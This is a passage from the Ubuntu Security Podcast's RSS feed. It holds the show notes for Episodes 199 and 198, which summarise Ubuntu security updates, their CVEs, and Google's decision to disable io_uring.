plus we discuss Google&rsquo;s findings on the <code>io_uring</code> kernel subsystem and we look
at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>53 unique CVEs addressed</p>
<h3 id="usn-6145-1-sysstat-vulnerabilities--00-55">[<a href="https://ubuntu.com/security/notices/USN-6145-1">USN-6145-1</a>] Sysstat vulnerabilities (00:55)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33204">CVE-2023-33204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39377">CVE-2022-39377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>system performance tools - integer overflow leading to possible buffer
overflow - original fix was incomplete so a second CVE was issued</li>
</ul>
<h3 id="usn-6146-1-netatalk-vulnerabilities--01-22">[<a href="https://ubuntu.com/security/notices/USN-6146-1">USN-6146-1</a>] Netatalk vulnerabilities (01:22)</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45188">CVE-2022-45188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43634">CVE-2022-43634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23125">CVE-2022-23125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23124">CVE-2022-23124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23123">CVE-2022-23123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23122">CVE-2022-23122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23121">CVE-2022-23121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0194">CVE-2022-0194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31439">CVE-2021-31439</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Implementation of the Apple Filing Protocol - allows a Ubuntu server to share
files with macOS clients - similar to Samba for Windows</li>
<li>Lots of different buffer overflows - some / most disclosed via ZDI</li>
<li>Almost all due to missing length checks on the input data - some OOB write,
others OOB read - sadly there is no AppArmor profile for netatalk but it would
be interesting to try and create one</li>
</ul>
<h3 id="usn-6147-1-spidermonkey-vulnerability--02-21">[<a href="https://ubuntu.com/security/notices/USN-6147-1">USN-6147-1</a>] SpiderMonkey vulnerability (02:21)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34416">CVE-2023-34416</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest release of mozjs-102.12.0 (Mozilla&rsquo;s SpiderMonkey JS engine)</li>
<li>Used by gnome-shell etc</li>
<li>Upstream mozilla describes this issue as &lsquo;memory safety bugs&rsquo;</li>
</ul>
<h3 id="usn-6149-1-linux-kernel-vulnerabilities--02-52">[<a href="https://ubuntu.com/security/notices/USN-6149-1">USN-6149-1</a>] Linux kernel vulnerabilities (02:52)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 based kernel (Xenial GA kernel)</li>
<li>All interesting CVEs discussed last week - <a href="/episode-198/#usn-6130-1-linux-kernel-vulnerabilities--02-23">[USN-6130-1] Linux kernel vulnerabilities in Episode 198</a></li>
<li>OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver</li>
<li>KVM mishandling of control registers for nested guest VMs</li>
<li>OOB write in network queuing scheduler - able to be triggered though an
unprivileged user namespace (again)</li>
<li>race condition -&gt; UAF -&gt; privesc in netfilter</li>
</ul>
<h3 id="usn-6150-1-usn-6162-1-linux-kernel-vulnerabilities--03-55">[<a href="https://ubuntu.com/security/notices/USN-6150-1">USN-6150-1</a>, <a href="https://ubuntu.com/security/notices/USN-6162-1">USN-6162-1</a>] Linux kernel vulnerabilities (03:55)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Raspi + Intel-IoTG 22.04 LTS,</li>
<li>5.4 Raspi + Intel-IoTG 20.04 LTS</li>
</ul>
<h3 id="usn-6151-1-linux-kernel--xilinx-zynqmp--vulnerabilities--04-13">[<a href="https://ubuntu.com/security/notices/USN-6151-1">USN-6151-1</a>] Linux kernel (Xilinx ZynqMP) vulnerabilities (04:13)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4</li>
</ul>
<h3 id="usn-6152-1-linux-kernel--gke--regression--04-21">[<a href="https://ubuntu.com/security/notices/USN-6152-1">USN-6152-1</a>] Linux kernel (GKE) regression (04:21)</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS)</li>
<li>5.15 - NFS cache issue causing a severe degradation in performance under
certain conditions</li>
</ul>
<h3 id="usn-6153-1-jupyter-core-vulnerability--04-42">[<a href="https://ubuntu.com/security/notices/USN-6153-1">USN-6153-1</a>] Jupyter Core vulnerability (04:42)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39286">CVE-2022-39286</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Executed untrusted files from current working directory - possible RCE - would
unconditionally prepend the current working dir to the search path</li>
</ul>
<h3 id="usn-6154-1-vim-vulnerabilities--04-58">[<a href="https://ubuntu.com/security/notices/USN-6154-1">USN-6154-1</a>] Vim vulnerabilities (04:58)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2610">CVE-2023-2610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2609">CVE-2023-2609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2426">CVE-2023-2426</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Moar vim CVEs</li>
<li>Seems we talk about vim every month or so lately</li>
<li>Only a few CVEs per year until 2021 - then 20, 113 for 2022, so far only 15
for 2023 - is this the sign that the rate of vim CVEs are decreasing?</li>
</ul>
<figure><img src="/img/vim-cves-by-year.png"
    alt="Figure 1: Vulnerabilities by year in vim from https://www.cvedetails.com/product/14270/VIM-VIM.html?vendor_id=8218"><figcaption>
      <p><!-- raw HTML omitted -->Figure 1: <!-- raw HTML omitted -->Vulnerabilities by year in vim from <a href="https://www.cvedetails.com/product/14270/VIM-VIM.html?vendor_id=8218">https://www.cvedetails.com/product/14270/VIM-VIM.html?vendor_id=8218</a></p>
    </figcaption>
</figure>

<h3 id="usn-6155-1-requests-vulnerability--05-56">[<a href="https://ubuntu.com/security/notices/USN-6155-1">USN-6155-1</a>] Requests vulnerability (05:56)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32681">CVE-2023-32681</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python requests library - leaked Proxy-Authorization headers to the
destination server when redirected by a HTTPS endpoint</li>
</ul>
<h3 id="usn-6156-1-sssd-vulnerability--06-11">[<a href="https://ubuntu.com/security/notices/USN-6156-1">USN-6156-1</a>] SSSD vulnerability (06:11)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4254">CVE-2022-4254</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to sanitise certificate attributes before issuing an LDAP search -
ie. a certificate may contain parenthesis in say the <code>Subject DN</code> field - this
would then be used directly in the query and would be interpreted as
parameters in the LDAP query - could then allow a malicious client to provide
a crafted certificate which performs arbitrary LDAP queries etc - such that
when used in conjunction with FreeIPA they could elevate their privileges</li>
</ul>
<h3 id="usn-6148-1-sni-proxy-vulnerability--06-54">[<a href="https://ubuntu.com/security/notices/USN-6148-1">USN-6148-1</a>] SNI Proxy vulnerability (06:54)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25076">CVE-2023-25076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow when handling a crafted HTTP packet that specifies an IPv6
address longer than the maximum possible - since parses it into a fixed size
buffer</li>
</ul>
<h3 id="usn-6157-1-glusterfs-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6157-1">USN-6157-1</a>] GlusterFS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26253">CVE-2023-26253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack buffer overread - generally protected by stack protector on Ubuntu -
crash -&gt; DoS</li>
</ul>
<h3 id="usn-6143-2-firefox-regressions--07-25">[<a href="https://ubuntu.com/security/notices/USN-6143-2">USN-6143-2</a>] Firefox regressions (07:25)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34415">CVE-2023-34415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34417">CVE-2023-34417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34416">CVE-2023-34416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34414">CVE-2023-34414</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>114.0.1 - crash on startup if on disk metadata is corrupted / invalid - fixed
to just indicate an error occurred and continue without the data</li>
</ul>
<h3 id="usn-6158-1-node-fetch-vulnerability--07-45">[<a href="https://ubuntu.com/security/notices/USN-6158-1">USN-6158-1</a>] Node Fetch vulnerability (07:45)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0235">CVE-2022-0235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>If redirected to another site, would leak the cookie of the originating site
to the other - violation of same origin policy</li>
</ul>
<h3 id="usn-6159-1-tornado-vulnerability--07-59">[<a href="https://ubuntu.com/security/notices/USN-6159-1">USN-6159-1</a>] Tornado vulnerability (07:59)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28370">CVE-2023-28370</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Open redirect - allows an attacker to craft a URL to a site that when visited
will redirect the user to a different arbitrary site - can then be used to
phish the user</li>
</ul>
<h3 id="usn-6160-1-gnu-binutils-vulnerability--08-27">[<a href="https://ubuntu.com/security/notices/USN-6160-1">USN-6160-1</a>] GNU binutils vulnerability (08:27)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45078">CVE-2021-45078</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap based buffer overflow when reading certain debugging information - could
then possibly get code execution - requires the user to run objdump or similar
on an attacker controlled binary - in general binutils is expected to only be
run on trusted inputs - so if you are using objdump etc for reverse
engineering arbitrary binaries, should do this in an isolated environment - VM</li>
</ul>
<h3 id="usn-6161-1-dot-net-vulnerabilities--09-02">[<a href="https://ubuntu.com/security/notices/USN-6161-1">USN-6161-1</a>] .NET vulnerabilities (09:02)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33128">CVE-2023-33128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32032">CVE-2023-32032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29337">CVE-2023-29337</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29331">CVE-2023-29331</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24936">CVE-2023-24936</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest .NET point releases from Microsoft for .NET 6 and 7 fixing various
issues in the language runtime (not a lot of details provided by MS on these)</li>
</ul>
<h3 id="usn-6164-1-c-ares-vulnerabilities--09-24">[<a href="https://ubuntu.com/security/notices/USN-6164-1">USN-6164-1</a>] c-ares vulnerabilities (09:24)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32067">CVE-2023-32067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31130">CVE-2023-31130</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>library for async DNS lookups - used by apt-cacher-ng, frr, wireshark, sssd
and more</li>
<li>Buffer underflow when looking up crafted IPv6 addresses - appears to be able
to be tricked into writing infront of an allocated buffer - memory corruption
-&gt; DoS / RCE</li>
<li>DoS via an attacker forging a zero length UDP packet in response to a query -
then cause the resolver to shutdown the &ldquo;connection&rdquo; as it sees a 0 byte
read - however that code path assumes the transport protocol is TCP - this is
not a valid assumption for UDP as UDP is connectionless</li>
</ul>
<h3 id="usn-6165-1-glib-vulnerabilities--11-07">[<a href="https://ubuntu.com/security/notices/USN-6165-1">USN-6165-1</a>] GLib vulnerabilities (11:07)</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32665">CVE-2023-32665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32643">CVE-2023-32643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32636">CVE-2023-32636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32611">CVE-2023-32611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29499">CVE-2023-29499</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25180">CVE-2023-25180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24593">CVE-2023-24593</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues in the handling of GVariants - looks like someone has been
fuzzing glib - GVariant used for on-the-wire encoding of parameters in DBus
etc - similar to protobuf&rsquo;s etc</li>
</ul>
<h3 id="usn-6166-1-libcap2-vulnerabilities--11-35">[<a href="https://ubuntu.com/security/notices/USN-6166-1">USN-6166-1</a>] libcap2 vulnerabilities (11:35)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2603">CVE-2023-2603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2602">CVE-2023-2602</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via a memory leak through thread creation plus an integer overflow when
handling really large strings</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="google-disables-io-uring-in-chromeos-and-their-production-servers--12-00">Google disables <code>io_uring</code> in ChromeOS and their production servers (12:00)</h3>
<ul>
<li><a href="https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html">https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html</a></li>
<li>Google runs kCTF as part of the vuln rewards program, offering a bug-bounty /
monetary rewards for researchers who find exploitable bugs in Google
Kubernetes Engine (GKE) or the underlying Linux kernel</li>
<li>Has paid out $1.8m USD - 60% of submissions exploited <code>io_uring</code> - with around
$1m USD rewarded for <code>io_uring</code> submissions alone - and <code>io_uring</code> was used in all
submissions which bypassed their mitigations
<ul>
<li>followed by net and then fs subsystems</li>
<li>clearly is a target rich environment</li>
</ul>
</li>
<li>As such, disabled <code>io_uring</code> in ChromeOS (was originally enabled back in
November 2022 to increase performance of their <code>arcvm</code> which is used to run
Android apps on ChromeOS) but then now <a href="https://chromium-review.googlesource.com/c/chromiumos/third_party/kernel/+/4228112">disabled</a> 4 months later in Feb this
year</li>
<li>Use seccomp-bpf to block access to <code>io_uring</code> to Android applications and in the
future will also use SELinux to restrict access even further to only select
system processes</li>
<li>Will likely disable it also on GKE AutoPilot - where Google manages the config
of your GKE Kubernetes cluster</li>
<li>And have disabled <code>io_uring</code> on their production servers</li>
<li>Essentially due to the newness of <code>io_uring</code> and ongoing development of features
for it, it presents too much of a risk for use by untrusted applications etc</li>
</ul>
<h3 id="andrei-discusses-fuzzing-configurations-of-program-options--15-06">Andrei discusses Fuzzing Configurations of Program Options (15:06)</h3>
<ul>
<li><a href="https://doi.org/10.1145/3580597">https://doi.org/10.1145/3580597</a></li>
<li><a href="https://google.github.io/fuzzbench/">https://google.github.io/fuzzbench/</a></li>
<li><a href="https://github.com/google/AFL">https://github.com/google/AFL</a></li>
<li><a href="https://github.com/AFLplusplus/AFLplusplus">https://github.com/AFLplusplus/AFLplusplus</a></li>
<li><a href="https://llvm.org/docs/CommandGuide/llvm-cov.html">https://llvm.org/docs/CommandGuide/llvm-cov.html</a></li>
<li><a href="https://github.com/google/AFL/tree/master/experimental/argv_fuzzing">https://github.com/google/AFL/tree/master/experimental/argv_fuzzing</a></li>
<li><a href="https://github.com/AFLplusplus/AFLplusplus/tree/stable/utils/argv_fuzzing">https://github.com/AFLplusplus/AFLplusplus/tree/stable/utils/argv_fuzzing</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E199.mp3" length="28566522" type="audio/mpeg" /><itunes:duration>1639</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 198
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-198/</link>
          <pubDate>Fri, 09 Jun 2023 17:12:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>805ffacde91c7e1b89609a0a9d218935401df96f8d8efc81afddf79bd8aff377b51684afd73489069699f25c249974d677d3547776e3fcc7d43e2d72841e62ee</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 198</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we investigate the mystery of failing GPG signatures for the 16.04 ISO
  images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR,
  Go and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we investigate the mystery of failing GPG signatures for the 16.04 ISO
  images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR,
  Go and more.
  </itunes:summary>
        <description>  This week we investigate the mystery of failing GPG signatures for the 16.04 ISO
  images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR,
  Go and more.
  </description>
        <googleplay:description>  This week we investigate the mystery of failing GPG signatures for the 16.04 ISO
  images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR,
  Go and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we investigate the mystery of failing GPG signatures for the 16.04 ISO
images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR,
Go and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>58 unique CVEs addressed</p>
<h3 id="usn-6128-1-usn-6128-2-cups-vulnerability--00-56">[<a href="https://ubuntu.com/security/notices/USN-6128-1">USN-6128-1</a>, <a href="https://ubuntu.com/security/notices/USN-6128-2">USN-6128-2</a>] CUPS vulnerability (00:56)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32324">CVE-2023-32324</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow when printing debug messages - apparently requires
<code>cupsd.conf</code> to have <code>LogLevel</code> as <code>debug</code> which is not usually the case</li>
</ul>
<h3 id="usn-6129-1-avahi-vulnerability--01-39">[<a href="https://ubuntu.com/security/notices/USN-6129-1">USN-6129-1</a>] Avahi vulnerability (01:39)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1981">CVE-2023-1981</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS -&gt; if called with an unknown service name, would result in a NULL pointer
dereference and crash - found via <a href="https://github.com/dbus-fuzzer/dfuzzer">dfuzzer</a> - a fuzzer for D-Bus services</li>
</ul>
<h3 id="usn-6130-1-linux-kernel-vulnerabilities--02-23">[<a href="https://ubuntu.com/security/notices/USN-6130-1">USN-6130-1</a>] Linux kernel vulnerabilities (02:23)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 GA for 18.04 ESM (generic, virtual, lowlatency, KVM, AWS, Snapdragon, Azure, GCP, Oracle)
<ul>
<li>HWE + GCP, Azure, GKE, AWS etc for 16.04 ESM</li>
<li>Azure for 14.04 ESM</li>
</ul>
</li>
<li>race condition -&gt; UAF -&gt; privesc in netfilter
<ul>
<li><a href="/episode-197/#usn-6122-1-linux-kernel--oem--vulnerabilities--04-49">[USN-6122-1] Linux kernel (OEM) vulnerabilities from Episode 197</a></li>
</ul>
</li>
<li>KVM mishandling of control registers for nested guest VMs
<ul>
<li><a href="/episode-197/#usn-6123-1-linux-kernel--oem--vulnerabilities--06-48">[USN-6123-1] Linux kernel (OEM) vulnerabilities from Episode 197</a></li>
</ul>
</li>
<li>OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver -
requires an attacker to create a malicious USB device and insert that into
your machine to be able to trigger (shout out to <a href="https://usbguard.github.io/">USBGuard</a>)</li>
<li>OOB write in network queuing scheduler - able to be triggered though an
unprivileged user namespace (again)</li>
</ul>
<h3 id="usn-6127-1-linux-kernel-vulnerabilities--04-41">[<a href="https://ubuntu.com/security/notices/USN-6127-1">USN-6127-1</a>] Linux kernel vulnerabilities (04:41)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15
<ul>
<li>22.10 GA (virtual, raspi, generic, aws, lowlatency, ibm, azure, gcp, oracle, kvm, aws)</li>
<li>22.04 HWE (ditto)</li>
<li>20.04 HWE (ditto + OEMs)</li>
</ul>
</li>
<li>Same as above plus a race condition in shiftfs -&gt; kernel deadlock -&gt; DoS</li>
</ul>
<h3 id="usn-6135-1-linux-kernel--azure-cvm--vulnerabilities--05-06">[<a href="https://ubuntu.com/security/notices/USN-6135-1">USN-6135-1</a>] Linux kernel (Azure CVM) vulnerabilities (05:06)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Azure FDE (22.04, 20.04)</li>
</ul>
<h3 id="usn-6131-1-linux-kernel-vulnerabilities--05-18">[<a href="https://ubuntu.com/security/notices/USN-6131-1">USN-6131-1</a>] Linux kernel vulnerabilities (05:18)</h3>
<ul>
<li>5 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GA 20.04, HWE 18.04</li>
</ul>
<h3 id="usn-6132-1-linux-kernel-vulnerabilities--05-30">[<a href="https://ubuntu.com/security/notices/USN-6132-1">USN-6132-1</a>] Linux kernel vulnerabilities (05:30)</h3>
<ul>
<li>13 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
